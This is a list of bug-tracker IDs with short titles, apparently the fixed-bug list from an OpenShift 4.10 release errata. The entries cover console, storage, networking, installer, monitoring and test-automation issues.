2000268 - Mark cluster unupgradable if vcenter, esxi versions or HW versions are unsupported
2000430 - bump cluster-api-provider-ovirt version in installer
2000450 - 4.10: Enable static PV multi-az test
2000490 - All critical alerts shipped by CMO should have links to a runbook
2000521 - Kube-apiserver CO degraded due to failed conditional check (ConfigObservationDegraded)
2000573 - Incorrect StorageCluster CR created and ODF cluster getting installed with 2 Zone OCP cluster
2000628 - ibm-flashsystem-storage-storagesystem got created without any warning even when the attempt was cancelled
2000651 - ImageStreamTag alias results in wrong tag and invalid link in Web Console
2000754 - IPerf2 tests should be lower
2000846 - Structure logs in the entire codebase of Local Storage Operator
2000872 - [tracker] container is not able to list on some directories within the nfs after upgrade to 4.7.24
2000877 - OCP ignores STOPSIGNAL in Dockerfile and sends SIGTERM
2000938 - CVO does not respect changes to a Deployment strategy
2000963 - 'Inline-volume (default fs)] volumes should store data' tests are failing on OKD with updated selinux-policy
2001008 - [MachineSets] CloneMode defaults to linkedClone, but I don't have snapshot and should be fullClone
2001240 - Remove response headers for downloads of binaries from OpenShift WebConsole
2001295 - Remove openshift:kubevirt-machine-controllers declaration from machine-api
2001317 - OCP Platform Quota Check - Inaccurate MissingQuota error
2001337 - Details Card in ODF Dashboard mentions OCS
2001339 - fix text content hotplug
2001413 - [e2e][automation] add/delete nic and disk to template
2001441 - Test: oc adm must-gather runs successfully for audit logs - fail due to startup log
2001442 - Empty termination.log file for the kube-apiserver has too permissive mode
2001479 - IBM Cloud DNS unable to create/update records
2001566 - Enable alerts for prometheus operator in UWM
2001575 - Clicking on the perspective switcher shows a white page with loader
2001577 - Quick search placeholder is not displayed properly when the search string is removed
2001578 - [e2e][automation] add tests for vm dashboard tab
2001605 - PVs remain in Released state for a long time after the claim is deleted
2001617 - BucketClass Creation is restricted on 1st page but enabled using side navigation options
2001620 - Cluster becomes degraded if it can't talk to Manila
2001760 - While creating 'Backing Store', 'Bucket Class', 'Namespace Store' user is navigated to 'Installed Operators' page after clicking on ODF
2001761 - Unable to apply cluster operator storage for SNO on GCP platform.
2001765 - Some error message in the log of diskmaker-manager caused confusion
2001784 - show loading page before final results instead of showing a transient message No log files exist
2001804 - Reload feature on Environment section in Build Config form does not work properly
2001810 - cluster admin unable to view BuildConfigs in all namespaces
2001817 - Failed to load RoleBindings list that will lead to ‘Role name’ is not able to be selected on Create RoleBinding page as well
2001823 - OCM controller must update operator status
2001825 - [SNO]ingress/authentication clusteroperator degraded when enable ccm from start
2001835 - Could not select image tag version when create app from dev console
2001855 - Add capacity is disabled for ocs-storagecluster
2001856 - Repeating event: MissingVersion no image found for operand pod
2001959 - Side nav list borders don't extend to edges of container
2002007 - Layout issue on "Something went wrong" page
2002010 - ovn-kube may never attempt to retry a pod creation
2002012 - Cannot change volume mode when cloning a VM from a template
2002027 - Two instances of Dotnet helm chart show as one in topology
2002075 - opm render does not automatically pulling in the image(s) used in the deployments
2002121 - [OVN] upgrades failed for IPI OSP16 OVN IPSec cluster
2002125 - Network policy details page heading should be updated to Network Policy details
2002133 - [e2e][automation] add support/virtualization and improve deleteResource
2002134 - [e2e][automation] add test to verify vm details tab
2002215 - Multipath day1 not working on s390x
2002238 - Image stream tag is not persisted when switching from yaml to form editor
2002262 - [vSphere] Incorrect user agent in vCenter sessions list
2002266 - SinkBinding create form doesn't allow to use subject name, instead of label selector
2002276 - OLM fails to upgrade operators immediately
2002300 - Altering the Schedule Profile configurations doesn't affect the placement of the pods
2002354 - Missing DU configuration "Done" status reporting during ZTP flow
2002362 - Dynamic Plugin - ConsoleRemotePlugin for webpack doesn't use commonjs
2002368 - samples should not go degraded when image allowedRegistries blocks imagestream creation
2002372 - Pod creation failed due to mismatched pod IP address in CNI and OVN
2002397 - Resources search is inconsistent
2002434 - CRI-O leaks some children PIDs
2002443 - Getting undefined error on create local volume set page
2002461 - DNS operator performs spurious updates in response to API's defaulting of service's internalTrafficPolicy
2002504 - When the openshift-cluster-storage-operator is degraded because of "VSphereProblemDetectorController_SyncError", the insights operator is not sending the logs from all pods.
2002559 - User preference for topology list view does not follow when a new namespace is created
2002567 - Upstream SR-IOV worker doc has broken links
2002588 - Change text to be sentence case to align with PF
2002657 - ovn-kube egress IP monitoring is using a random port over the node network
2002713 - CNO: OVN logs should have millisecond resolution
2002748 - [ICNI2] 'ErrorAddingLogicalPort' failed to handle external GW check: timeout waiting for namespace event
2002759 - Custom profile should not allow not including at least one required HTTP2 ciphersuite
2002763 - Two storage systems getting created with external mode RHCS
2002808 - KCM does not use web identity credentials
2002834 - Cluster-version operator does not remove unrecognized volume mounts
2002896 - Incorrect result return when user filter data by name on search page
2002950 - Why spec.containers.command is not created with "oc create deploymentconfig --image= -- "
2003096 - [e2e][automation] check bootsource URL is displaying on review step
2003113 - OpenShift Baremetal IPI installer uses first three defined nodes under hosts in install-config for master nodes instead of filtering the hosts with the master role
2003120 - CI: Uncaught error with ResizeObserver on operand details page
2003145 - Duplicate operand tab titles causes "two children with the same key" warning
2003164 - OLM, fatal error: concurrent map writes
2003178 - [FLAKE][knative] The UI doesn't show updated traffic distribution after accepting the form
2003193 - Kubelet/crio leaks netns and veth ports in the host
2003195 - OVN CNI should ensure host veths are removed
2003204 - Jenkins all new container images (openshift4/ose-jenkins) not supporting '-e JENKINS_PASSWORD=password' ENV which was working for old container images
2003206 - Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace
2003239 - "[sig-builds][Feature:Builds][Slow] can use private repositories as build input" tests fail outside of CI
2003244 - Revert libovsdb client code
2003251 - Patternfly components with list element has list item bullet when they should not.
2003252 - "[sig-builds][Feature:Builds][Slow] starting a build using CLI start-build test context override environment BUILD_LOGLEVEL in buildconfig" tests do not work as expected outside of CI
2003269 - Rejected pods should be filtered from admission regression
2003357 - QE- Removing the epic tags for gherkin tags related to 4.9 Release
2003426 - [e2e][automation] add test for vm details bootorder
2003496 - [e2e][automation] add test for vm resources requirment settings
2003641 - All metal ipi jobs are failing in 4.10
2003651 - ODF4.9+LSO4.8 installation via UI, StorageCluster move to error state
2003655 - [IPI ON-PREM] Keepalived chk_default_ingress track script failed even though default router pod runs on node
2003683 - Samples operator is panicking in CI
2003711 - [UI] Empty file ceph-external-cluster-details-exporter.py downloaded from external cluster "Connection Details" page
2003715 - Error on creating local volume set after selection of the volume mode
2003743 - Remove workaround keeping /boot RW for kdump support
2003775 - etcd pod on CrashLoopBackOff after master replacement procedure
2003788 - CSR reconciler report error constantly when BYOH CSR approved by other Approver
2003792 - Monitoring metrics query graph flyover panel is useless
2003808 - Add Sprint 207 translations
2003845 - Project admin cannot access image vulnerabilities view
2003859 - sdn emits events with garbage messages
2003896 - (release-4.10) ApiRequestCounts conditional gatherer
2004009 - 4.10: Fix multi-az zone scheduling e2e for 5 control plane replicas
2004051 - CMO can report as being Degraded while node-exporter is deployed on all nodes
2004059 - [e2e][automation] fix current tests for downstream
2004060 - Trying to use basic spring boot sample causes crash on Firefox
2004101 - [UI] When creating storageSystem deployment type dropdown under advanced setting doesn't close after selection
2004127 - [flake] openshift-controller-manager event reason/SuccessfulDelete occurs too frequently
2004203 - build config's created prior to 4.8 with image change triggers can result in trigger storm in OCM/openshift-apiserver
2004313 - [RHOCP 4.9.0-rc.0] Failing to deploy Azure cluster from the macOS installer - ignition_bootstrap.ign: no such file or directory
2004449 - Boot option recovery menu prevents image boot
2004451 - The backup filename displayed in the RecentBackup message is incorrect
2004459 - QE - Modified the AddFlow gherkin scripts and automation scripts
2004508 - TuneD issues with the recent ConfigParser changes.
2004510 - openshift-gitops operator hooks gets unauthorized (401) errors during jobs executions
2004542 - [osp][octavia lb] cannot create LoadBalancer type svcs
2004578 - Monitoring and node labels missing for an external storage platform
2004585 - prometheus-k8s-0 cpu usage keeps increasing for the first 3 days
2004596 - [4.10] Bootimage bump tracker
2004597 - Duplicate ramdisk log containers running
2004600 - Duplicate ramdisk log containers running
2004609 - output of "crictl inspectp" is not complete
2004625 - BMC credentials could be logged if they change
2004632 - When LE takes a large amount of time, multiple whereabouts are seen
2004721 - ptp/worker custom threshold doesn't change ptp events threshold
2004736 - [knative] Create button on new Broker form is inactive despite form being filled
2004796 - [e2e][automation] add test for vm scheduling policy
2004814 - (release-4.10) OCM controller - change type of the etc-pki-entitlement secret to opaque
2004870 - [External Mode] Insufficient spacing along y-axis in RGW Latency Performance Card
2004901 - [e2e][automation] improve kubevirt devconsole tests
2004962 - Console frontend job consuming too much CPU in CI
2005014 - state of ODF StorageSystem is misreported during installation or uninstallation
2005052 - Adding a MachineSet selector matchLabel causes orphaned Machines
2005179 - pods status filter is not taking effect
2005182 - sync list of deprecated apis about to be removed
2005282 - Storage cluster name is given as title in StorageSystem details page
2005355 - setuptools 58 makes Kuryr CI fail
2005407 - ClusterNotUpgradeable Alert should be set to Severity Info
2005415 - PTP operator with sidecar api configured throws bind: address already in use
2005507 - SNO spoke cluster failing to reach coreos.live.rootfs_url is missing url in console
2005554 - The switch status of the button "Show default project" is not revealed correctly in code
2005581 - 4.8.12 to 4.9 upgrade hung due to cluster-version-operator pod CrashLoopBackOff: error creating clients: invalid configuration: no configuration has been provided, try setting KUBERNETES_MASTER environment variable
2005761 - QE - Implementing crw-basic feature file
2005783 - Fix accessibility issues in the "Internal" and "Internal - Attached Mode" Installation Flow
2005811 - vSphere Problem Detector operator - ServerFaultCode: InvalidProperty
2005854 - SSH NodePort service is created for each VM
2005901 - KS, KCM and KA going Degraded during master nodes upgrade
2005902 - Current UI flow for MCG only deployment is confusing and doesn't reciprocate any message to the end-user
2005926 - PTP operator NodeOutOfPTPSync rule is using max offset from the master instead of openshift_ptp_clock_state metrics
2005971 - Change telemeter to report the Application Services product usage metrics
2005997 - SELinux domain container_logreader_t does not have a policy to follow sym links for log files
2006025 - Description to use an existing StorageClass while creating StorageSystem needs to be re-phrased
2006060 - ocs-storagecluster-storagesystem details are missing on UI for MCG Only and MCG only in LSO mode deployment types
2006101 - Power off fails for drivers that don't support Soft power off
2006243 - Metal IPI upgrade jobs are running out of disk space
2006291 - bootstrapProvisioningIP set incorrectly when provisioningNetworkCIDR doesn't use the 0th address
2006308 - Backing Store YAML tab on click displays a blank screen on UI
2006325 - Multicast is broken across nodes
2006329 - Console only allows Web Terminal Operator to be installed in OpenShift Operators
2006364 - IBM Cloud: Set resourceGroupId for resourceGroups, not simply resource
2006561 - [sig-instrumentation] Prometheus when installed on the cluster shouldn't have failing rules evaluation [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2006690 - OS boot failure "x64 Exception Type 06 - Invalid Opcode Exception"
2006714 - add retry for etcd errors in kube-apiserver
2006767 - KubePodCrashLooping may not fire
2006803 - Set CoreDNS cache entries for forwarded zones
2006861 - Add Sprint 207 part 2 translations
2006945 - race condition can cause crashlooping bootstrap kube-apiserver in cluster-bootstrap
2006947 - e2e-aws-proxy for 4.10 is permafailing with samples operator errors
2006975 - clusteroperator/etcd status condition should not change reasons frequently due to EtcdEndpointsDegraded
2007085 - Intermittent failure mounting /run/media/iso when booting live ISO from USB stick
2007136 - Creation of BackingStore, BucketClass, NamespaceStore fails
2007271 - CI Integration for Knative test cases
2007289 - kubevirt tests are failing in CI
2007322 - Devfile/Dockerfile import does not work for unsupported git host
2007328 - Updated patternfly to v4.125.3 and pf.quickstarts to v1.2.3.
2007379 - Events are not generated for master offset for ordinary clock
2007443 - [ICNI 2.0] Loadbalancer pods do not establish BFD sessions with all workers that host pods for the routed namespace
2007455 - cluster-etcd-operator: render command should fail if machineCidr contains reserved address
2007495 - Large label value for the metric kubelet_started_pods_errors_total with label message when there is a error
2007522 - No new local-storage-operator-metadata-container is built for 4.10
2007551 - No new ose-aws-efs-csi-driver-operator-bundle-container is built for 4.10
2007580 - Azure cilium installs are failing e2e tests
2007581 - Too many haproxy processes in default-router pod causing high load average after upgrade from v4.8.3 to v4.8.10
2007677 - Regression: core container io performance metrics are missing for pod, qos, and system slices on nodes
2007692 - 4.9 "old-rhcos" jobs are permafailing with storage test failures
2007710 - ci/prow/e2e-agnostic-cmd job is failing on prow
2007757 - must-gather extracts imagestreams in the "openshift" namespace, but not Templates
2007802 - AWS machine actuator get stuck if machine is completely missing
2008096 - TestAWSFinalizerDeleteS3Bucket sometimes fails to teardown operator
2008119 - The serviceAccountIssuer field on Authentication CR is reset to "" during installation process
2008151 - Topology breaks on clicking in empty state
2008185 - Console operator go.mod should use go 1.16.version
2008201 - openstack-az job is failing on haproxy idle test
2008207 - vsphere CSI driver doesn't set resource limits
2008223 - gather_audit_logs: fix oc command line to get the current audit profile
2008235 - The Save button in the Edit DC form remains disabled
2008256 - Update Internationalization README with scope info
2008321 - Add correct documentation link for MON_DISK_LOW
2008462 - Disable PodSecurity feature gate for 4.10
2008490 - Backing store details page does not contain all the kebab actions.
2008521 - gcp-hostname service should correct invalid search entries in resolv.conf
2008532 - CreateContainerConfigError:: failed to prepare subPath for volumeMount
2008539 - Registry doesn't fall back to secondary ImageContentSourcePolicy Mirror
2008540 - HighlyAvailableWorkloadIncorrectlySpread always fires on upgrade on cluster with two workers
2008599 - Azure Stack UPI does not have Internal Load Balancer
2008612 - Plugin asset proxy does not pass through browser cache headers
2008712 - VPA webhook timeout prevents all pods from starting
2008733 - kube-scheduler: exposed /debug/pprof port
2008911 - Prometheus repeatedly scaling prometheus-operator replica set
2008926 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]
2008987 - OpenShift SDN Hosted Egress IP's are not being scheduled to nodes after upgrade to 4.8.12
2009055 - Instances of OCS to be replaced with ODF on UI
2009078 - NetworkPodsCrashLooping alerts in upgrade CI jobs
2009083 - opm blocks pruning of existing bundles during add
2009111 - [IPI-on-GCP] 'Install a cluster with nested virtualization enabled' failed due to unable to launch compute instances
2009131 - [e2e][automation] add more test about vmi
2009148 - [e2e][automation] test vm nic presets and options
2009233 - ACM policy object generated by PolicyGen conflicting with OLM Operator
2009253 - [BM] [IPI] [DualStack] apiVIP and ingressVIP should be of the same primary IP family
2009298 - Service created for VM SSH access is not owned by the VM and thus is not deleted if the VM is deleted
2009384 - UI changes to support BindableKinds CRD changes
2009404 - ovnkube-node pod enters CrashLoopBackOff after OVN_IMAGE is swapped
2009424 - Deployment upgrade is failing availability check
2009454 - Change web terminal subscription permissions from get to list
2009465 - container-selinux should come from rhel8-appstream
2009514 - Bump OVS to 2.16-15
2009555 - Supermicro X11 system not booting from vMedia with AI
2009623 - Console: Observe > Metrics page: Table pagination menu shows bullet points
2009664 - Git Import: Edit of knative service doesn't work as expected for git import flow
2009699 - Failure to validate flavor RAM
2009754 - Footer is not sticky anymore in import forms
2009785 - CRI-O's version file should be pinned by MCO
2009791 - Installer: ibmcloud ignores install-config values
2009823 - [sig-arch] events should not repeat pathologically - reason/VSphereOlderVersionDetected Marking cluster un-upgradeable because one or more VMs are on hardware version vmx-13
2009840 - cannot build extensions on aarch64 because of unavailability of rhel-8-advanced-virt repo
2009859 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests
2009873 - Stale Logical Router Policies and Annotations for a given node
2009879 - There should be test-suite coverage to ensure admin-acks work as expected
2009888 - SRO package name collision between official and community version
2010073 - uninstalling and then reinstalling sriov-network-operator is not working
2010174 - 2 PVs get created unexpectedly with different paths that actually refer to the same device on the node.
2010181 - Environment variables not getting reset on reload on deployment edit form
2010310 - [sig-instrumentation][Late] OpenShift alerting rules should have description and summary annotations [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2010341 - OpenShift Alerting Rules Style-Guide Compliance
2010342 - Local console builds can have out of memory errors
2010345 - OpenShift Alerting Rules Style-Guide Compliance
2010348 - Reverts PIE build mode for K8S components
2010352 - OpenShift Alerting Rules Style-Guide Compliance
2010354 - OpenShift Alerting Rules Style-Guide Compliance
2010359 - OpenShift Alerting Rules Style-Guide Compliance
2010368 - OpenShift Alerting Rules Style-Guide Compliance
2010376 - OpenShift Alerting Rules Style-Guide Compliance
2010662 - Cluster is unhealthy after image-registry-operator tests
2010663 - OpenShift Alerting Rules Style-Guide Compliance (ovn-kubernetes subcomponent)
2010665 - Bootkube tries to use oc after cluster bootstrap is done and there is no API
2010698 - [BM] [IPI] [Dual Stack] Installer must ensure ipv6 short forms too if clusterprovisioning IP is specified as ipv6 address
2010719 - etcdHighNumberOfFailedGRPCRequests runbook is missing
2010864 - Failure building EFS operator
2010910 - ptp worker events unable to identify interface for multiple interfaces
2010911 - RenderOperatingSystem() returns wrong OS version on OCP 4.7.24
2010921 - Azure Stack Hub does not handle additionalTrustBundle
2010931 - SRO CSV uses non default category "Drivers and plugins"
2010946 - concurrent CRD from ovirt-csi-driver-operator gets reconciled by CVO after deployment, changing CR as well.
2011038 - optional operator conditions are confusing
2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass
2011171 - diskmaker-manager constantly redeployed by LSO when creating LV's
2011293 - Build pod are not pulling images if we are not explicitly giving the registry name with the image
2011368 - Tooltip in pipeline visualization shows misleading data
2011386 - [sig-arch] Check if alerts are firing during or after upgrade success --- alert KubePodNotReady fired for 60 seconds with labels
2011411 - Managed Service's Cluster overview page contains link to missing Storage dashboards
2011443 - Cypress tests assuming Admin Perspective could fail on shared/reference cluster
2011513 - Kubelet rejects pods that use resources that should be freed by completed pods
2011668 - Machine stuck in deleting phase in VMware "reconciler failed to Delete machine"
2011693 - (release-4.10) "insightsclient_request_recvreport_total" metric is always incremented
2011698 - After upgrading cluster to 4.8 the kube-state-metrics service doesn't export namespace labels anymore
2011733 - Repository README points to broken documentation link
2011753 - Ironic resumes clean before raid configuration job is actually completed
2011809 - The nodes page in the openshift console doesn't work. You just get a blank page
2011822 - Obfuscation doesn't work at clusters with OVN
2011882 - SRO helm charts not synced with templates
2011893 - Validation: BMC driver ipmi is not supported for secure UEFI boot
2011896 - [4.10] ClusterVersion Upgradeable=False MultipleReasons should include all messages
2011903 - vsphere-problem-detector: session leak
2011927 - OLM should allow users to specify a proxy for GRPC connections
2011956 - [tracker] Kubelet rejects pods that use resources that should be freed by completed pods
2011960 - [tracker] Storage operator is not available after reboot cluster instances
2011971 - ICNI2 pods are stuck in ContainerCreating state
2011972 - Ingress operator not creating wildcard route for hypershift clusters
2011977 - SRO bundle references non-existent image
2012069 - Refactoring Status controller
2012177 - [OCP 4.9 + OCS 4.8.3] Overview tab is missing under Storage after successful deployment on UI
2012228 - ibmcloud: credentialsrequests invalid for machine-api-operator: resource-group
2012233 - [IBMCLOUD] IPI: "Exceeded limit of remote rules per security group (the limit is 5 remote rules per security group)"
2012235 - [IBMCLOUD] IPI: IBM cloud provider requires ResourceGroupName in cloudproviderconfig
2012317 - Dynamic Plugins: ListPageCreateDropdown items cut off
2012407 - [e2e][automation] improve vm tab console tests
2012426 - ThanosSidecarBucketOperationsFailed/ThanosSidecarUnhealthy alerts don't have namespace label
2012562 - migration condition is not detected in list view
2012770 - when using expression metric openshift_apps_deploymentconfigs_last_failed_rollout_time namespace label is re-written
2012780 - The port 50936 used by haproxy is occupied by kube-apiserver
2012838 - Setting the default maximum container root partition size for Overlay with CRI-O stops working
2012902 - Neutron Ports assigned to Completed Pods are not reused
2012915 - kube_persistentvolumeclaim_labels and kube_persistentvolume_labels are missing in OCP 4.8 monitoring stack
2012971 - Disable operands deletes
2013034 - Cannot install to openshift-nmstate namespace
2013127 - OperatorHub links could not be opened in a new tabs (sharing and open a deep link works fine)
2013199 - post reboot of node SRIOV policy taking huge time
2013203 - UI breaks when trying to create block pool before storage cluster/system creation
2013222 - Full breakage for nightly payload promotion
2013273 - Nil pointer exception when phc2sys options are missing
2013321 - TuneD: high CPU utilization of the TuneD daemon.
2013416 - Multiple assets emit different content to the same filename
2013431 - Application selector dropdown has incorrect font-size and positioning
2013528 - mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8
2013545 - Service binding created outside topology is not visible
2013599 - Scorecard support storage is not included in ocp4.9
2013632 - Correction/Changes in Quick Start Guides for ODF 4.9 (Install ODF guide)
2013646 - fsync controller will show false positive if gaps in metrics are observed.
2013710 - ZTP Operator subscriptions for 4.9 release branch should point to 4.9 by default
2013751 - Service details page is showing wrong in-cluster hostname
2013787 - There are two titles 'Network Attachment Definition Details' on NAD details page
2013871 - Resource table headings are not aligned with their column data
2013895 - Cannot enable accelerated network via MachineSets on Azure
2013920 - "--collector.filesystem.ignored-mount-points is DEPRECATED and will be removed in 2.0.0, use --collector.filesystem.mount-points-exclude"
2013930 - Create Buttons enabled for Bucket Class, Backingstore and Namespace Store in the absence of Storagesystem(or MCG)
2013969 - oVIrt CSI driver fails on creating PVCs on hosted engine storage domain
2013990 - Observe dashboard crashes on reload when perspective has changed (in another tab)
2013996 - Project detail page: Action "Delete Project" does nothing for the default project
2014071 - Payload imagestream new tags not properly updated during cluster upgrade
2014153 - SRIOV exclusive pooling
2014202 - [OCP-4.8.10] OVN-Kubernetes: service IP is not responding when egressIP set to the namespace
2014238 - AWS console test is failing on importing duplicate YAML definitions
2014245 - Several aria-labels, external links, and labels aren't internationalized
2014248 - Several files aren't internationalized
2014352 - Could not filter out machine by using node name on machines page
2014464 - Unexpected spacing/padding below navigation groups in developer perspective
2014471 - Helm Release notes tab is not automatically opened after installing a chart for other languages
2014486 - Integration Tests: OLM single namespace operator tests failing
2014488 - Custom operator cannot change orders of condition tables
2014497 - Regex slows down different forms and creates too many recursion errors in the log
2014538 - Kuryr controller crash looping on self._get_vip_port(loadbalancer).id 'NoneType' object has no attribute 'id'
2014614 - Metrics scraping requests should be assigned to exempt priority level
2014710 - TestIngressStatus test is broken on Azure
2014954 - The prometheus-k8s-{0,1} pods are CrashLoopBackoff repeatedly
2014995 - oc adm must-gather cannot gather audit logs with 'None' audit profile
2015115 - [RFE] PCI passthrough
2015133 - [IBMCLOUD] ServiceID API key credentials seems to be insufficient for ccoctl '--resource-group-name' parameter
2015154 - Support ports defined networks and primarySubnet
2015274 - Yarn dev fails after updates to dynamic plugin JSON schema logic
2015337 - 4.9.0 GA MetalLB operator image references need to be adjusted to match production
2015386 - Possibility to add labels to the built-in OCP alerts
2015395 - Table head on Affinity Rules modal is not fully expanded
2015416 - CI implementation for Topology plugin
2015418 - Project Filesystem query returns No datapoints found
2015420 - No vm resource in project view's inventory
2015422 - No conflict checking on snapshot name
2015472 - Form and YAML view switch button should have distinguishable status
2015481 - [4.10] sriov-network-operator daemon pods are failing to start
2015493 - Cloud Controller Manager Operator does not respect 'additionalTrustBundle' setting
2015496 - Storage - PersistentVolumes : Claim column value 'No Claim' in English
2015498 - [UI] Add capacity when not applicable (for MCG only deployment and External mode cluster) fails to pass any info. to user and tries to just load a blank screen on 'Add Capacity' button click
2015506 - Home - Search - Resources - APIRequestCount : hard to select an item from ellipsis menu
2015515 - Kubelet checks all providers even if one is configured: NoCredentialProviders: no valid providers in chain.
2015535 - Administration - ResourceQuotas - ResourceQuota details: Inside Pie chart 'x% used' is in English
2015549 - Observe - Metrics: Column heading and pagination text is in English
2015557 - Workloads - DeploymentConfigs : Error message is in English
2015568 - Compute - Nodes : CPU column's values are in English
2015635 - Storage operator fails causing installation to fail on ASH
2015660 - "Finishing boot source customization" screen should not use term "patched"
2015793 - [hypershift] The collect-profiles job's pods should run on the control-plane node
2015806 - Metrics view in Deployment reports "Forbidden" when not cluster-admin
2015819 - Conmon sandbox processes run on non-reserved CPUs with workload partitioning
2015837 - OS_CLOUD overwrites install-config's platform.openstack.cloud
2015950 - update from 4.7.22 to 4.8.11 is failing due to large amount of secrets to watch
2015952 - RH CodeReady Workspaces Operator in e2e testing will soon fail
2016004 - [RFE] RHCOS: help determining whether a user-provided image was already booted (Ignition provisioning already performed)
2016008 - [4.10] Bootimage bump tracker
2016052 - No e2e CI presubmit configured for release component azure-file-csi-driver
2016053 - No e2e CI presubmit configured for release component azure-file-csi-driver-operator
2016054 - No e2e CI presubmit configured for release component cluster-autoscaler
2016055 - No e2e CI presubmit configured for release component console
2016058 - openshift-sync does not synchronise in "ose-jenkins:v4.8"
2016064 - No e2e CI presubmit configured for release component ibm-cloud-controller-manager
2016065 - No e2e CI presubmit configured for release component ibmcloud-machine-controllers
2016175 - Pods get stuck in ContainerCreating state when attaching volumes fails on SNO clusters.
2016179 - Add Sprint 208 translations
2016228 - Collect Profiles pprof secret is hardcoded to openshift-operator-lifecycle-manager
2016235 - should update to 7.5.11 for grafana resources version label
2016296 - Openshift virtualization : Create Windows Server 2019 VM using template : Fails
2016334 - shiftstack: SRIOV nic reported as not supported
2016352 - Some pods start before CA resources are present
2016367 - Empty task box is getting created for a pipeline without finally task
2016435 - Duplicate AlertmanagerClusterFailedToSendAlerts alerts
2016438 - Feature flag gating is missing in few extensions contributed via knative plugin
2016442 - OCPonRHV: pvc should be in Bound state and without error when choosing default sc
2016446 - [OVN-Kubernetes] Egress Networkpolicy is failing Intermittently for statefulsets
2016453 - Complete i18n for GaugeChart defaults
2016479 - iface-id-ver is not getting updated for existing lsp
2016925 - Dashboards with All filter, change to a specific value and change back to All, data will disappear
2016951 - dynamic actions list is not disabling "open console" for stopped vms
2016955 - m5.large instance type for bootstrap node is hardcoded causing deployments to fail if instance type is not available
2016988 - NTO does not set io_timeout and max_retries for AWS Nitro instances
2017016 - [REF] Virtualization menu
2017036 - [sig-network-edge][Feature:Idling] Unidling should handle many TCP connections fails in periodic-ci-openshift-release-master-ci-4.9-e2e-openstack-ovn
2017050 - Dynamic Plugins: Shared modules loaded multiple times, breaking use of PatternFly
2017130 - t is not a function error navigating to details page
2017141 - Project dropdown has a dynamic inline width added which can cause min-width issue
2017244 - ovirt csi operator static files creation is in the wrong order
2017276 - [4.10] Volume mounts not created with the correct security context
2017327 - Running opm index prune fails with error: removing operator package cic-operator: FOREIGN KEY constraint failed.
2017427 - NTO does not restart TuneD daemon when profile application is taking too long
2017535 - Broken Argo CD link image on GitOps Details Page
2017547 - Siteconfig application sync fails with The AgentClusterInstall is invalid: spec.provisionRequirements.controlPlaneAgents: Required value when updating images references
2017564 - On-prem prepender dispatcher script overwrites DNS search settings
2017565 - CCMO does not handle additionalTrustBundle on Azure Stack
2017566 - MetalLB: Web Console -Create Address pool form shows address pool name twice
2017606 - [e2e][automation] add test to verify send key for VNC console
2017650 - [OVN]EgressFirewall cannot be applied correctly if cluster has windows nodes
2017656 - VM IP address is "undefined" under VM details -> ssh field
2017663 - SSH password authentication is disabled when public key is not supplied
2017680 - [gcp] Couldn’t enable support for instances with GPUs on GCP
2017732 - [KMS] Prevent creation of encryption enabled storageclass without KMS connection set
2017752 - (release-4.10) obfuscate identity provider attributes in collected authentication.operator.openshift.io resource
2017756 - overlaySize setting on containerruntimeconfig is ignored due to cri-o defaults
2017761 - [e2e][automation] dummy bug for 4.9 test dependency
2017872 - Add Sprint 209 translations
2017874 - The installer is incorrectly checking the quota for X instances instead of G and VT instances
2017879 - Add Chinese translation for "alternate"
2017882 - multus: add handling of pod UIDs passed from runtime
2017909 - [ICNI 2.0] ovnkube-masters stop processing add/del events for pods
2018042 - HorizontalPodAutoscaler CPU averageValue did not show up in HPA metrics GUI
2018093 - Managed cluster should ensure control plane pods do not run in best-effort QoS
2018094 - the tooltip length is limited
2018152 - CNI pod is not restarted when It cannot start servers due to ports being used
2018208 - e2e-metal-ipi-ovn-ipv6 are failing 75% of the time
2018234 - user settings are saved in local storage instead of on cluster
2018264 - Delete Export button doesn't work in topology sidebar (general issue with unknown CSV?)
2018272 - Deployment managed by link and topology sidebar links to invalid resource page (at least for Exports)
2018275 - Topology graph doesn't show context menu for Export CSV
2018279 - Edit and Delete confirmation modals for managed resource should close when the managed resource is clicked
2018380 - Migrate docs links to access.redhat.com
2018413 - Error: context deadline exceeded, OCP 4.8.9
2018428 - PVC is deleted along with VM even with "Delete Disks" unchecked
2018445 - [e2e][automation] enhance tests for downstream
2018446 - [e2e][automation] move tests to different level
2018449 - [e2e][automation] add test about create/delete network attachment definition
2018490 - [4.10] Image provisioning fails with file name too long
2018495 - Fix typo in internationalization README
2018542 - Kernel upgrade does not reconcile DaemonSet
2018880 - Get 'No datapoints found.' when query metrics about alert rule KubeCPUQuotaOvercommit and KubeMemoryQuotaOvercommit
2018884 - QE - Adapt crw-basic feature file to OCP 4.9/4.10 changes
2018935 - go.sum not updated, that ART extracts version string from, WAS: Missing backport from 4.9 for Kube bump PR#950
2018965 - e2e-metal-ipi-upgrade is permafailing in 4.10
2018985 - The rootdisk size of the Windows VM is 15Gi in the customize wizard
2019001 - AWS: Operator degraded (CredentialsFailing): 1 of 6 credentials requests are failing to sync.
2019096 - Update SRO leader election timeout to support SNO
2019129 - SRO in operator hub points to wrong repo for README
2019181 - Performance profile does not apply
2019198 - ptp offset metrics are not named according to the log output
2019219 - [IBMCLOUD]: cloud-provider-ibm missing IAM permissions in CCCMO CredentialRequest
2019284 - Stop action should not in the action list while VMI is not running
2019346 - zombie processes accumulation and Argument list too long
2019360 - [RFE] Virtualization Overview page
2019452 - Logger object in LSO appends to existing logger recursively
2019591 - Operator install modal body that scrolls has incorrect padding causing shadow position to be incorrect
2019634 - Pause and migration is enabled in action list for a user who has view only permission
2019636 - Actions in VM tabs should be disabled when user has view only permission
2019639 - "Take snapshot" should be disabled while VM image is still being imported
2019645 - Create button is not removed on "Virtual Machines" page for view only user
2019646 - Permission error should pop-up immediately while clicking "Create VM" button on template page for view only user
2019647 - "Remove favorite" and "Create new Template" should be disabled in template action list for view only user
2019717 - can't delete VM with un-owned pvc attached
2019722 - The shared-resource-csi-driver-node pod runs as “BestEffort” qosClass
2019739 - The shared-resource-csi-driver-node uses imagePullPolicy as "Always"
2019744 - [RFE] Suggest users to download newest RHEL 8 version
